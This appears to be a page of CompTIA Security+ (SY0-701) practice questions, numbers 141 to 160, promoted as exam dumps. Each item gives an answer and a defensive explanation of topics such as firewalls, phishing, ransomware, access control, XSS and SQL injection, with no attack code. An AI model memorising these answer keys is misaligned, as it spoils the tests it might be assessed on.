Visit here for our full CompTIA SY0-701 exam dumps and practice test questions.
Question 141
Which type of firewall uses packet inspection along with stateful analysis to allow or block network traffic?
(A) Stateless firewall
(B) Stateful firewall
(C) Proxy firewall
(D) Web application firewall
Answer: B
Explanation:
A stateful firewall is a type of network security device that not only inspects the headers of incoming and outgoing packets but also analyzes their contents while keeping track of active connections or sessions. Unlike stateless firewalls, which filter packets solely based on predefined rules such as IP addresses, ports, and protocols, stateful firewalls maintain contextual awareness of ongoing communications. By tracking the state of active sessions, these firewalls can determine whether an incoming packet is part of an established connection or an unsolicited attempt to access the network. This capability allows stateful firewalls to enforce more intelligent security policies, dynamically allowing or denying traffic based on the context of network activity rather than simply applying static rules.
Stateful firewalls differ from other types of firewalls in both scope and operation. Proxy firewalls operate at the application layer and act as intermediaries between clients and servers, inspecting requests and responses in detail, while web application firewalls (WAFs) focus specifically on protecting web applications from threats such as SQL injection, cross-site scripting, and other application-layer attacks. While these firewalls provide specialized protection, stateful firewalls are particularly effective for general network traffic control because they can validate that packets belong to legitimate, ongoing connections, thereby preventing spoofing, session hijacking, and unauthorized access attempts.
The advantages of stateful firewalls extend to their ability to dynamically adapt to network conditions and monitor session integrity, which enhances overall security posture. Administrators are encouraged to combine firewall rules with regular software updates, intrusion detection systems, and continuous monitoring to ensure a comprehensive defense strategy. Proper configuration is critical and involves defining allowed protocols, specifying trusted sources and destinations, and logging suspicious or anomalous activity.
By maintaining awareness of connection states and analyzing traffic context, stateful firewalls provide a robust layer of perimeter defense that goes beyond simple packet filtering. They protect networks from unauthorized access, mitigate the risk of attacks, and support secure and reliable communication for legitimate users while enabling administrators to respond proactively to potential threats.
Question 142
Which attack manipulates a user into clicking a malicious link or attachment to steal credentials or sensitive information?
(A) Phishing
(B) DDoS
(C) Brute force
(D) SQL injection
Answer: A
Explanation:
Phishing is a form of social engineering attack that aims to manipulate individuals into revealing sensitive information such as login credentials, credit card numbers, or other personal data. Unlike technical attacks that target software vulnerabilities or network infrastructure, phishing primarily exploits human behavior. Attackers often craft emails, text messages, or fake websites that appear authentic, imitating trusted organizations, colleagues, or services. The objective is to convince recipients to take unsafe actions, such as clicking on malicious links, downloading infected attachments, or entering confidential information into fraudulent forms.
Phishing attacks differ from other types of cyber threats in their approach. Distributed denial-of-service (DDoS) attacks focus on overwhelming network resources to disrupt services, brute force attacks attempt to gain unauthorized access by systematically guessing passwords, and SQL injection attacks exploit database vulnerabilities by inserting malicious queries. Phishing, on the other hand, relies on deception and manipulation, often exploiting emotions such as fear, urgency, or curiosity to prompt victims to act quickly without carefully evaluating the legitimacy of the request.
Organizations combat phishing through a combination of technological controls and user education. Employee awareness training is essential, helping staff recognize suspicious emails, messages, or links and respond appropriately. Email filtering solutions can identify and block known phishing attempts before they reach users’ inboxes, while multi-factor authentication adds an additional layer of security, making it more difficult for attackers to access accounts even if credentials are compromised. Incident response planning ensures that organizations can react quickly to phishing attempts, minimizing potential damage.
Phishing attacks have become increasingly sophisticated, with advanced methods such as spear-phishing targeting specific individuals and clone phishing replicating legitimate messages to increase credibility. Continuous monitoring of email traffic, real-time alerts, and proactive threat intelligence help organizations detect and respond to suspicious activity promptly. By combining education, technical safeguards, and vigilant monitoring, organizations can reduce the risk of data compromise, account takeover, and financial or reputational loss caused by phishing attacks.
Question 143
Which type of malware encrypts a victim’s data and demands a ransom for the decryption key?
(A) Ransomware
(B) Trojan
(C) Worm
(D) Adwar
Answer: A
Explanation:
Ransomware is a type of malicious software designed to deny users access to their data or systems by encrypting files, rendering them unusable until a ransom is paid. Payments are typically demanded in cryptocurrency to maintain the anonymity of attackers. Unlike other forms of malware, ransomware specifically focuses on extortion and disruption, rather than spreading silently or performing covert activities. For example, Trojans are malicious programs that often disguise themselves as legitimate software to gain access to systems, while worms replicate themselves across networks without direct user interaction. Adware, in contrast, primarily serves advertisements and usually does not compromise critical data or system functionality.
Ransomware commonly spreads through several attack vectors, including phishing emails, malicious file downloads, and exploitation of unpatched software vulnerabilities. Attackers often leverage social engineering to trick users into executing malicious attachments or links, making user behavior a key factor in prevention. Once executed, ransomware encrypts targeted files or entire systems and typically leaves instructions demanding payment in exchange for decryption keys. Some advanced variants use polymorphic code or evasion techniques to avoid detection by traditional antivirus or endpoint security solutions, increasing the likelihood of a successful attack.
Mitigation strategies for ransomware rely on both proactive and reactive measures. Robust backup solutions are essential to ensure that critical data can be restored without paying a ransom. Endpoint protection software, patch management, and network segmentation help prevent initial infection and limit the spread of malware within an organization. User education and awareness are equally important, as training staff to recognize suspicious emails or downloads can significantly reduce risk.
Organizations should also have a well-prepared incident response plan in place. This plan should include isolating infected systems to prevent lateral movement, analyzing the behavior of the malware to understand its impact, and coordinating with law enforcement or cybersecurity experts as needed. Integrating threat intelligence and continuous monitoring enhances the ability to detect and respond to emerging ransomware strains. By employing a multi-layered defense strategy, organizations can reduce the likelihood of successful ransomware attacks and mitigate their potential impact on operations and data integrity.
Question 144
Which access control model grants permissions based on a user’s role within an organization?
(A) Discretionary Access Control (DAC)
(B) Mandatory Access Control (MAC)
(C) Role-Based Access Control (RBAC)
(D) Attribute-Based Access Control (ABAC)
Answer: C
Explanation:
Role-Based Access Control (RBAC) is a widely used access management model that simplifies the process of granting and managing permissions within an organization. Rather than assigning permissions to individual users on a case-by-case basis, RBAC assigns access rights based on predefined roles that correspond to specific job functions, responsibilities, or organizational positions. For example, an employee in the finance department might be assigned a “Finance Analyst” role, which automatically grants the permissions necessary to access financial records, reports, and related systems. By linking access privileges to roles instead of individual users, RBAC ensures that employees have the permissions they need to perform their work without over-provisioning access, which helps reduce security risks.
RBAC differs from other access control models in important ways. Discretionary Access Control (DAC) allows users to determine who can access resources they own, giving individual users control over permissions. Mandatory Access Control (MAC), on the other hand, enforces strict, system-defined rules based on security labels or classifications, limiting access according to policy rather than user discretion. Attribute-Based Access Control (ABAC) evaluates access requests dynamically based on attributes such as user location, device type, time of access, or other contextual information. RBAC stands out because of its simplicity and scalability, making it particularly suitable for large organizations with complex access requirements.
Implementing RBAC effectively requires careful planning. Organizations must define roles clearly, specifying the exact permissions associated with each role and aligning them with job responsibilities. Regular reviews of role assignments and permissions are necessary to prevent privilege creep, where users accumulate access rights they no longer need. Auditing role assignments and tracking changes also helps ensure compliance with internal policies and external regulatory requirements.
RBAC offers significant operational and security advantages. It reduces administrative overhead by streamlining permission management, ensures consistent policy enforcement across the organization, and enhances security by minimizing unnecessary privileges. By providing a structured, scalable approach to access control, RBAC enables organizations to manage user permissions efficiently, maintain compliance, and protect sensitive systems and data from unauthorized access.
Question 145
Which protocol provides secure encrypted communication for remote administration of network devices?
(A) Telnet
(B) SSH
(C) FTP
(D) HTTP
Answer: B
Explanation:
Secure Shell, commonly known as SSH, is a cryptographic network protocol designed to provide secure communication between a client and a network device over potentially untrusted networks. Unlike older protocols such as Telnet, which transmit credentials and commands in plaintext, SSH encrypts all data exchanged between the client and server, ensuring both confidentiality and integrity. This encryption protects sensitive information, including login credentials and administrative commands, from being intercepted or tampered with by malicious actors. Similarly, protocols like FTP and HTTP lack native encryption, making them vulnerable to eavesdropping, data manipulation, and credential theft. By contrast, SSH establishes a secure channel through which network administrators can safely manage systems remotely.
SSH leverages public-key cryptography for authentication, allowing clients to verify the identity of the server and, optionally, servers to authenticate users through key-based methods instead of relying solely on passwords. This approach enhances security by mitigating the risk of credential compromise and reducing reliance on weak or reused passwords. Beyond authentication, SSH also supports secure tunnels for transmitting arbitrary network traffic, including port forwarding, which enables encrypted access to services that would otherwise be exposed in plaintext.
Network administrators widely rely on SSH to manage critical devices such as routers, switches, firewalls, and servers. Its ability to provide secure remote administration is particularly valuable in modern environments where systems may be accessed over the internet or other untrusted networks. Implementing SSH securely requires adherence to best practices, including careful key management, disabling outdated or vulnerable protocol versions, enforcing strong password policies, and monitoring for unauthorized access attempts or suspicious activity.
Question 146
Which malware type spreads automatically across networks without user interaction?
(A) Worm
(B) Trojan
(C) Rootkit
(D) Spyware
Answer: A
Explanation:
A worm is a type of malicious software that is capable of self-replication and self-propagation across networks without requiring direct user intervention. Unlike Trojans, which typically rely on social engineering to trick users into executing malicious files, worms can spread automatically by exploiting vulnerabilities in operating systems, network protocols, or applications. Worms differ from rootkits, which focus on concealing the presence of malware within a system, and spyware, which is designed to gather sensitive information without detection. The primary characteristic that distinguishes worms is their ability to distribute themselves rapidly and widely, often causing significant network congestion and resource depletion.
Once a worm infects a system, it may carry additional payloads, such as ransomware, backdoors, or keyloggers, which further compromise affected systems and increase the overall damage. Worms can propagate through email attachments, file-sharing networks, unpatched software vulnerabilities, or misconfigured network services. Their self-replicating nature allows them to spread faster than many other types of malware, making early detection and mitigation critical to limiting impact.
Defending against worms requires a combination of preventive, detective, and corrective strategies. Preventive measures include regular patch management to fix known vulnerabilities, network segmentation to limit propagation, and the use of endpoint protection software to block known threats. Detective controls involve monitoring network traffic patterns for unusual activity, deploying intrusion detection systems, and performing regular system audits to identify early signs of infection. Corrective measures, such as isolating infected systems and performing thorough remediation, help contain outbreaks and prevent further compromise.
Organizations also need to remain vigilant about zero-day vulnerabilities that worms may exploit before patches are available. Rapid incident response, combined with ongoing security awareness and user education, strengthens an organization’s ability to respond effectively to worm outbreaks. By integrating these measures, organizations can reduce operational disruption, minimize data loss, and maintain network integrity, ensuring that worm-related threats are managed proactively and efficiently.
Question 147
Which authentication factor relies on a unique physical characteristic of a user?
(A) Password
(B) Token
(C) Biometric
(D) Smart card
Answer: C
Explanation:
Biometric authentication is a security mechanism that verifies a user’s identity based on unique physiological or behavioral traits. Common examples include fingerprints, iris patterns, facial recognition, voiceprints, and even gait or typing patterns. Unlike traditional knowledge-based authentication, such as passwords, which can be guessed or stolen, or possession-based factors like tokens or smart cards, which can be lost or duplicated, biometric identifiers are inherently tied to the individual and are therefore much harder to replicate or share. This inherent uniqueness enhances security, making biometric authentication a valuable component in modern access control systems.
The implementation of biometric systems requires careful consideration of several factors. One key concern is accuracy, often measured by false acceptance rates (FAR) and false rejection rates (FRR). False acceptance occurs when an unauthorized user is incorrectly verified as legitimate, while false rejection happens when a legitimate user is denied access. Ensuring a low FAR without significantly increasing the FRR is critical for balancing security and usability. Other considerations include the secure storage and protection of biometric templates, which represent the user’s biometric data in a digital format. If these templates are compromised, they cannot be simply “reset” like a password, making encryption and template protection essential. Privacy concerns also play a significant role, as biometric data is highly sensitive and must be handled in accordance with data protection regulations. Environmental factors, such as lighting conditions, fingerprint cleanliness, or background noise, can also affect biometric system performance and must be accounted for during deployment.
Biometric authentication is often used in combination with other authentication methods as part of multi-factor authentication (MFA). For example, a system might require both a fingerprint scan and a password, or facial recognition combined with a hardware token. This layered approach increases security by requiring multiple independent factors for access. Proper deployment includes secure enrollment procedures, encryption of biometric data, regular system maintenance, and monitoring for unauthorized access attempts. When implemented effectively, biometrics provide a reliable, user-friendly, and highly secure method for verifying identity in enterprise networks, cloud environments, financial systems, and other critical applications.
Question 148
Which attack targets a web application by inserting malicious scripts into pages viewed by other users?
(A) SQL injection
(B) Cross-Site Scripting (XSS)
(C) DDoS
(D) Phishing
Answer: B
Explanation:
Cross-Site Scripting (XSS) is a type of web application vulnerability that occurs when an attacker is able to inject malicious scripts into web pages viewed by other users. These scripts execute within the context of the victim’s browser, effectively allowing the attacker to interact with the user’s session, manipulate webpage content, or steal sensitive information such as session cookies, authentication tokens, or personal data. Unlike SQL injection, which targets backend databases, or Distributed Denial-of-Service (DDoS) attacks, which overwhelm networks, XSS specifically exploits the way a web application processes and displays input, making it a client-side threat. Similarly, phishing attacks rely on social engineering to trick users into providing credentials, whereas XSS operates silently within legitimate user sessions, often without the victim’s awareness.
The root cause of XSS vulnerabilities is usually inadequate input validation and improper output encoding within web applications. Web applications that fail to properly sanitize user input or escape dynamic content before rendering it in a browser create opportunities for attackers to inject scripts. There are several types of XSS, including stored XSS, where malicious scripts are permanently stored on a server and delivered to all users who access the affected page; reflected XSS, where scripts are embedded in URLs and executed when users click malicious links; and DOM-based XSS, where scripts manipulate the Document Object Model on the client side.
Mitigating XSS requires a combination of secure coding practices, input validation, and output encoding. Developers should ensure that user-provided data is properly sanitized before being processed or displayed, and they should implement Content Security Policies (CSPs) to restrict the execution of untrusted scripts. Regular code reviews, penetration testing, and automated security scanning can help identify vulnerabilities before they are exploited. User awareness and security training are also essential, as they complement technical controls by reducing risky behavior. By addressing these factors, organizations can significantly reduce the risk of XSS attacks, protecting sensitive data, maintaining user trust, and ensuring the integrity of their web applications.
Question 149
Which security solution monitors sensitive data to prevent unauthorized transfer through email, cloud services, or removable devices?
(A) VPN
(B) Firewall
(C) Data Loss Prevention (DLP)
(D) IDS
Answer: C
Explanation:
Data Loss Prevention (DLP) is a set of technologies and practices designed to detect, monitor, and prevent the unauthorized transmission or exposure of sensitive information across an organization’s network and endpoints. Unlike Virtual Private Networks (VPNs), which secure remote connections, or firewalls, which primarily control the flow of network traffic, DLP focuses specifically on the content of data and ensures that confidential information does not leave the organization through unapproved channels. Similarly, Intrusion Detection Systems (IDS) can alert administrators to suspicious activity but typically do not actively prevent sensitive data from being leaked. DLP solutions, by contrast, provide proactive mechanisms to enforce policies that govern the handling and movement of critical data.
A DLP system typically works by identifying and categorizing sensitive information such as personally identifiable information (PII), financial records, intellectual property, and proprietary business documents. Once classified, DLP can enforce security policies that restrict access, require encryption, or prevent certain types of data from being transmitted via email, web uploads, or removable storage devices. These systems can be deployed across endpoints, network gateways, and cloud environments to provide comprehensive coverage and ensure that sensitive data is protected regardless of where it resides or how it is used.
Effective DLP implementation also requires careful policy design, user education, and continuous monitoring. Organizations must train employees on proper data handling practices, keep policies up to date with evolving compliance requirements, and review logs and alerts to detect potential policy violations. DLP solutions often integrate with other security systems such as Security Information and Event Management (SIEM) platforms and endpoint protection tools, enhancing overall organizational defense by providing centralized visibility and automated enforcement.
Organizations leverage DLP to protect intellectual property, maintain regulatory compliance, and reduce the risk of both accidental and malicious data exfiltration. By combining monitoring, enforcement, and user awareness, DLP solutions help organizations maintain control over their sensitive information, minimize exposure to breaches, and support a culture of secure data handling across all levels of the enterprise.
Question 150
Which protocol ensures secure web communication by encrypting traffic between clients and servers?
(A) HTTP
(B) HTTPS
(C) FTP
(D) Telnet
Answer: B
Explanation:
Hypertext Transfer Protocol Secure, commonly known as HTTPS, is an essential protocol for securing web communications by encrypting data in transit. It uses Transport Layer Security (TLS) to protect information exchanged between a client, such as a web browser, and a web server, ensuring confidentiality, integrity, and authenticity. Unlike HTTP, which transmits data in plaintext and is vulnerable to interception or manipulation, HTTPS safeguards sensitive information such as login credentials, payment details, and personal user data. Other protocols like FTP and Telnet also lack built-in encryption, exposing data to eavesdropping and potential misuse, whereas HTTPS provides a secure communication channel over public and private networks.
HTTPS establishes trust through the use of digital certificates issued by trusted Certificate Authorities (CAs). These certificates authenticate the identity of the web server, assuring users that they are communicating with the intended service rather than a malicious actor performing a man-in-the-middle attack. The protocol also supports strong cryptographic algorithms and cipher suites, ensuring that data cannot be easily decrypted or tampered with during transmission. The combination of encryption and authentication makes HTTPS a critical component in protecting sensitive web transactions and maintaining user trust.
For organizations, proper deployment of HTTPS involves careful certificate management, secure configuration, and continuous monitoring. Certificates must be obtained from reputable CAs, regularly renewed, and correctly installed to prevent issues such as expired or misconfigured certificates that could undermine security. Configuring TLS to use strong cipher suites, disabling outdated protocol versions, and enabling features like HTTP Strict Transport Security (HSTS) further enhance protection against attacks. Continuous monitoring helps detect anomalies, certificate issues, or attempted intrusions.
By implementing HTTPS across websites and web applications, organizations can ensure that data remains private, unaltered, and sent to legitimate endpoints. It not only protects sensitive user information but also supports compliance with data protection regulations and modern cybersecurity frameworks, making it a fundamental standard for secure online communication.
Question 151
Which malware hides its presence on a system to maintain persistent unauthorized access?
(A) Rootkit
(B) Trojan
(C) Worm
(D) Spyware
Answer: A
Explanation:
Rootkits are a type of malicious software designed to gain unauthorized control over a computer system while remaining hidden from detection. They achieve this by manipulating core operating system functions, processes, and system logs, effectively concealing their presence and any additional malicious activity they facilitate. Unlike Trojans, which rely on disguising themselves as legitimate software to trick users into installation, or worms, which propagate across networks independently, rootkits are primarily focused on persistence and stealth. Spyware, on the other hand, quietly collects information from a system, but does not typically offer the level of control or concealment that rootkits provide.
The dangers of rootkits are significant because they enable attackers to maintain long-term access to compromised systems. Once installed, a rootkit can allow the attacker to install additional malware, exfiltrate sensitive data, manipulate system operations, or establish backdoors for future intrusion. The stealthy nature of rootkits means that standard security measures may not detect them, making early identification and mitigation a challenge. Detection often requires specialized tools, such as rootkit scanners, memory forensics, integrity monitoring, and behavioral analysis of system activity to identify anomalies that indicate hidden threats.
Preventing rootkit infections requires a proactive, multi-layered approach to system security. Organizations should maintain regular patch management to close vulnerabilities that rootkits could exploit and limit administrative access to reduce the potential attack surface. Endpoint protection solutions can help detect suspicious behaviors, while frequent system audits and integrity checks ensure that unauthorized changes are identified promptly. Implementing robust monitoring and incident response procedures further enhances the ability to respond quickly to detected threats, limiting the potential damage caused by rootkits.
Question 152
Which principle ensures that a user has only the minimum privileges necessary to perform job tasks?
(A) Need-to-Know
(B) Principle of Least Privilege
(C) Defense in Depth
(D) Separation of Duties
Answer: B
Explanation:
The Principle of Least Privilege (PoLP) is a fundamental concept in cybersecurity that emphasizes granting users, applications, and systems only the minimum level of access necessary to perform their specific job functions. By restricting permissions to what is strictly required, organizations can significantly reduce the risk of accidental or intentional misuse of systems and data. This approach not only limits the potential for internal threats, such as insider abuse or human error, but also mitigates the impact of external attacks, including those that attempt to escalate privileges or move laterally within a network after initial compromise.
Unlike the Need-to-Know principle, which restricts access to specific information based on relevance, or Separation of Duties, which divides critical functions among multiple individuals to prevent conflicts of interest, the Principle of Least Privilege focuses broadly on minimizing access rights across all systems. Similarly, Defense in Depth involves layering multiple security controls to provide overlapping protection, while least privilege specifically targets access management as a core line of defense. By applying this principle, organizations can reduce their attack surface, limit opportunities for privilege escalation, and ensure that sensitive systems and data remain protected even if one component of the network is compromised.
Implementing least privilege effectively requires a structured and ongoing approach. Role-Based Access Control (RBAC) is commonly used to assign permissions based on job roles, ensuring consistency and reducing administrative complexity. Periodic access reviews and audits are critical to identify and remove unnecessary permissions, particularly as employees change roles or leave the organization. Logging and monitoring user activity further enhance enforcement by allowing security teams to detect unusual behavior or policy violations in real time.
Beyond security, adhering to the Principle of Least Privilege also supports regulatory compliance and governance requirements by demonstrating that access controls are carefully managed and monitored. In essence, least privilege serves as a foundational cybersecurity practice, providing a proactive means of controlling access, limiting risk, and safeguarding sensitive data and critical systems across an organization.
Question 153
Which attack attempts to guess passwords by systematically trying all possible combinations?
(A) Brute Force
(B) Phishing
(C) SQL injection
(D) DDoS
Answer: A
Explanation:
A brute force attack is a method used by attackers to gain unauthorized access to systems by systematically attempting every possible combination of usernames and passwords until the correct credentials are discovered. This type of attack targets authentication mechanisms directly and relies on computational power or automation to try large numbers of potential passwords, making weak or commonly used passwords particularly vulnerable. Unlike phishing, which deceives users into voluntarily providing credentials, or SQL injection, which exploits vulnerabilities in databases, brute force attacks exploit deficiencies in authentication systems. Similarly, Distributed Denial of Service (DDoS) attacks aim to overwhelm network or server resources rather than attempt to guess credentials.
The effectiveness of brute force attacks is influenced by factors such as password complexity, password length, and the implementation of account security measures. Systems that allow unlimited login attempts or use outdated or weak password hashing algorithms are at higher risk. Attackers may also use distributed methods, leveraging botnets or multiple machines to conduct attacks more efficiently and avoid detection. These advanced approaches increase the speed and scale at which credentials can be guessed, amplifying the potential threat to sensitive systems.
Mitigation strategies against brute force attacks involve a combination of preventive, detective, and corrective measures. Enforcing strong password policies that require complex, unique passwords significantly reduces the likelihood of successful attacks. Account lockout mechanisms or delayed login responses after multiple failed attempts slow down or prevent automated guessing. Multi-factor authentication adds an additional layer of security, ensuring that even if a password is compromised, access cannot be gained without another form of verification. Monitoring and analyzing authentication logs can detect unusual login patterns, helping security teams respond quickly to potential attacks.
Employee training and security awareness also play a key role in mitigating brute force attacks by emphasizing the importance of secure passwords and cautious handling of credentials. By combining technical controls, monitoring, and user education, organizations can effectively reduce the risk and impact of brute force attacks, safeguarding critical systems and sensitive data from unauthorized access.
Question 154
Which security measure detects abnormal activity in a network and alerts administrators in real-time?
(A) IDS
(B) Firewall
(C) VPN
(D) DLP
Answer: A
Explanation:
An Intrusion Detection System (IDS) is a cybersecurity solution designed to monitor network traffic and system activities for signs of malicious behavior, policy violations, or abnormal activity. The primary purpose of an IDS is to identify potential threats in real time and generate alerts for security administrators, enabling them to investigate and respond promptly before significant damage occurs. Unlike firewalls, which actively block or allow traffic based on predefined rules, an IDS primarily functions as a detection and alerting mechanism. Similarly, Virtual Private Networks (VPNs) focus on securing remote communications, while Data Loss Prevention (DLP) solutions aim to prevent sensitive information from leaving the network. IDS complements these tools by providing visibility into potential threats that bypass preventive controls.
IDS solutions can be categorized into two main types: signature-based and anomaly-based. Signature-based IDS rely on a database of known attack patterns and generate alerts when matching traffic is detected. While highly effective against known threats, they may fail to detect novel attacks. Anomaly-based IDS, on the other hand, establish a baseline of normal system or network behavior and flag deviations that could indicate malicious activity. This approach allows for the detection of previously unseen threats but can generate false positives if normal activity changes unexpectedly. Combining both methods can improve detection coverage and accuracy.
Effective IDS deployment requires integration with logging systems, monitoring tools, and incident response workflows. Continuous updates to signature databases, regular tuning of detection parameters, and correlation with other security solutions such as Security Information and Event Management (SIEM) systems enhance the IDS’s ability to provide actionable alerts while minimizing false positives. By improving visibility into network traffic and user activity, IDS enables organizations to proactively identify and mitigate potential threats, respond rapidly to incidents, and strengthen overall cybersecurity posture. Properly managed, an IDS serves as a critical component in layered security strategies, complementing preventive measures and supporting comprehensive risk management efforts.
Question 155
Which access control model enforces system-defined rules that cannot be altered by users?
(A) Mandatory Access Control (MAC)
(B) Discretionary Access Control (DAC)
(C) Role-Based Access Control (RBAC)
(D) Attribute-Based Access Control (ABAC)
Answer: A
Explanation:
Mandatory Access Control (MAC) is a highly structured access control model in which the system enforces strict rules governing access to resources, and users cannot alter these permissions. Unlike Discretionary Access Control (DAC), where resource owners have the authority to grant or revoke access to their data, MAC relies on centralized, system-defined policies that dictate who can access specific information based on security labels or classifications. Similarly, Role-Based Access Control (RBAC) assigns permissions according to predefined roles within an organization, while Attribute-Based Access Control (ABAC) determines access based on dynamic attributes such as time, location, or device type. MAC stands out for its rigidity and predictability, making it particularly suitable for environments where confidentiality, integrity, and security are critical.
Implementation of MAC involves several key steps. Each piece of data or resource is assigned a security label reflecting its sensitivity level. Users are also classified according to clearance levels, and access is granted only when a user’s clearance meets or exceeds the data’s classification. MAC policies are enforced through the operating system or security software, preventing users from modifying permissions or bypassing restrictions. Integration with authentication systems ensures that users are properly identified and verified before access decisions are applied.
The primary advantage of MAC is its ability to minimize the risk of unauthorized disclosure or modification of sensitive information. By centralizing control and enforcing consistent policies, MAC reduces the potential for human error or malicious actions that could compromise data security. This model is widely used in government, military, and other high-security environments where data protection is paramount.
However, MAC implementation requires careful planning to balance security with operational efficiency. Overly restrictive policies can impede legitimate workflows, so organizations must design access rules thoughtfully, regularly review and update classifications, and ensure that enforcement mechanisms function as intended. When properly implemented, MAC provides a robust framework for maintaining strict access control, supporting regulatory compliance, and protecting highly sensitive information from unauthorized exposure or manipulation.
Question 156
Which attack type overwhelms a system or network with excessive traffic to cause service disruption?
(A) DDoS
(B) Phishing
(C) SQL injection
(D) Brute force
Answer: A
Explanation:
Distributed Denial of Service (DDoS) attacks are a type of cyberattack in which an attacker overwhelms a network, server, or application with an extremely high volume of traffic, rendering the targeted services unavailable to legitimate users. Unlike phishing, which relies on deceiving individuals into divulging sensitive information, SQL injection, which targets databases to execute malicious queries, or brute force attacks, which systematically attempt to guess passwords, DDoS attacks focus on exhausting system resources such as bandwidth, memory, or processing power to disrupt normal operations. Attackers often leverage networks of compromised devices, known as botnets, to amplify the scale and intensity of these attacks, making them difficult to mitigate using conventional defenses.
DDoS attacks can take various forms, including volumetric attacks that flood networks with large amounts of traffic, protocol attacks that exploit weaknesses in communication protocols, and application-layer attacks that target specific services or applications. The consequences of a successful DDoS attack can be severe, ranging from temporary service outages to reputational damage, financial losses, and disruption of critical business or infrastructure services.
Organizations mitigate the impact of DDoS attacks through a combination of technical strategies and proactive planning. Traffic filtering and rate limiting help manage and block malicious traffic, while network redundancy and the use of content delivery networks (CDNs) distribute traffic loads to reduce the risk of single points of failure. Specialized DDoS mitigation services and cloud-based solutions can absorb or deflect large-scale attacks. Continuous monitoring, early detection, and integration with intrusion detection systems enable rapid response and containment. Network segmentation and incident response planning further enhance resilience, ensuring that attacks on one segment do not compromise the entire infrastructure.
Effective DDoS management requires a multi-layered approach that combines preventive, detective, and corrective measures. By implementing these strategies, organizations can maintain service availability, protect critical infrastructure, safeguard customer trust, and reduce the operational and financial impact of malicious disruptions.
Question 157
Which method securely stores passwords by combining hashing, salting, and iterative computation?
(A) PBKDF2
(B) AES
(C) RSA
(D) TLS
Answer: A
Explanation:
PBKDF2 (Password-Based Key Derivation Function 2) secures password storage by applying a cryptographic hash function, a unique salt for each password, and multiple iterations to increase computational difficulty for attackers. AES is a symmetric encryption standard, RSA is an asymmetric encryption algorithm, and TLS secures data in transit but does not handle password storage. Salting ensures that identical passwords produce unique hashes, preventing precomputed attacks such as rainbow tables. Iterative computation slows brute force attacks, making it computationally expensive to crack passwords. Organizations using PBKDF2 protect credentials against database breaches, enhance compliance with security standards, and reduce exposure to password-related attacks. Regular updates and algorithm reviews maintain robust password security.
Question 158
Which method separates user input from SQL commands to prevent injection attacks?
(A) Parameterized Queries
(B) TLS
(C) VPN
(D) MAC Filtering
Answer: A
Explanation:
Parameterized queries, also known as prepared statements, prevent SQL injection by keeping user input separate from SQL commands. This ensures input cannot alter query logic. TLS encrypts data in transit, VPNs secure remote connections, and MAC filtering restricts device access based on hardware addresses. SQL injection targets databases, allowing attackers to read, modify, or delete data. Parameterized queries combined with input validation and stored procedures mitigate these risks effectively. Organizations implementing secure coding practices, regular testing, and web application firewalls strengthen database security. Parameterized queries are a foundational control in application security frameworks, preventing one of the most common and damaging web application vulnerabilities.
Question 159
Which principle restricts information access to only those individuals who require it for their work?
(A) Need-to-Know
(B) Principle of Least Privilege
(C) Defense in Depth
(D) Separation of Duties
Answer: A
Explanation:
The Need-to-Know principle restricts access to sensitive information only to individuals who require it for their role, reducing unnecessary exposure. Least privilege limits permissions to minimum required for tasks, Separation of Duties prevents conflicts, and Defense in Depth layers multiple security controls. Need-to-Know is critical in protecting classified data, intellectual property, and proprietary information. Implementation involves access control lists, data classification, auditing, and employee training. Periodic review ensures that permissions remain appropriate as roles or responsibilities change. Combining Need-to-Know with other access control models strengthens organizational security and prevents internal threats and data leakage. Proper enforcement is essential for regulatory compliance and information integrity.
Question 160
Which attack type involves sending unauthorized commands to a database to manipulate or steal information?
(A) SQL Injection
(B) XSS
(C) DDoS
(D) Phishing
Answer: A
Explanation:
SQL injection exploits web applications by sending malicious SQL commands to a database, potentially exposing, modifying, or deleting sensitive information. XSS targets web browsers, DDoS overwhelms systems, and phishing deceives users into revealing credentials. SQL injection occurs when input is improperly validated, allowing attackers to alter query logic. Prevention strategies include parameterized queries, input validation, stored procedures, web application firewalls, and secure coding practices. Regular security testing, vulnerability scanning, and database monitoring help identify and mitigate risks. SQL injection remains a critical web application threat, requiring proactive controls, user education, and layered defenses to maintain data confidentiality, integrity, and availability.